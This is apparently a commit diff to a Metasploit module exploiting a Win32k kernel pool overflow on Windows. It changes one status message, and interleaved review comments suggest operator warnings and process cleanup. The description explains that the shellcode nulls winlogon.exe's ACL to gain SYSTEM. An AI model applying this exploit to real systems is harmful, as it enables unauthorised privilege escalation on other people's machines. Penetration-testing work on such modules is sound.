Merge pull request #3 from Meatballs1/pr3090

Pr3090
bug/bundler_fix
kyuz0 2014-05-02 14:20:00 +01:00
commit faaf0787a5
1 changed files with 3 additions and 3 deletions

@ -15,13 +15,13 @@ class Metasploit3 < Msf::Exploit::Local
include Msf::Post::Windows::Process include Msf::Post::Windows::Process
include Msf::Post::Windows::FileInfo include Msf::Post::Windows::FileInfo
include Msf::Post::Windows::ReflectiveDLLInjection include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info={}) def initialize(info={})
super(update_info(info, { super(update_info(info, {
'Name' => 'Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)', 'Name' => 'Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)',
'Description' => %q{ 'Description' => %q{
A kernel pool overflow in Win32k which allows local privilege escalation. A kernel pool overflow in Win32k which allows local privilege escalation.
The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process). The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process).
This allows any unprivileged process to freely migrate to winlogon.exe, achieving This allows any unprivileged process to freely migrate to winlogon.exe, achieving
privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome's sandbox. privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome's sandbox.
NOTE: when you exit the meterpreter session, winlogon.exe is likely to crash. NOTE: when you exit the meterpreter session, winlogon.exe is likely to crash.
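Review bot: the side-effect stated in the Description context ("when you exit the meterpreter session, winlogon.exe is likely to crash") only reaches users who read the module info; since the shellcode nulls the ACL of a SYSTEM process, consider also surfacing that caveat at run time with a `print_warning` once the session is obtained, so an operator on the console sees it before detaching. Minor style point in the same block: "chrome's sandbox" should read "Chrome's sandbox".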
@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Local
process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS) process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.") print_good("Process #{process.pid} launched.")
rescue Rex::Post::Meterpreter::RequestError rescue Rex::Post::Meterpreter::RequestError
print_status("Operation failed. Trying to elevate the current process...") print_status("Operation failed. Hosting exploit in the current process...")
process = client.sys.process.open process = client.sys.process.open
end end
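Review bot: the reworded message "Hosting exploit in the current process..." describes the fallback accurately, but the rescue branch leaves the notepad instance identified by `notepad_process_pid` running when `client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)` raises; consider terminating that process (or at least printing its pid) in the `rescue Rex::Post::Meterpreter::RequestError` branch before falling back to `client.sys.process.open`, so a failed attempt does not leave an orphaned process on the host. Since this path is a degraded mode rather than normal progress, `print_warning` would also fit better than `print_status`.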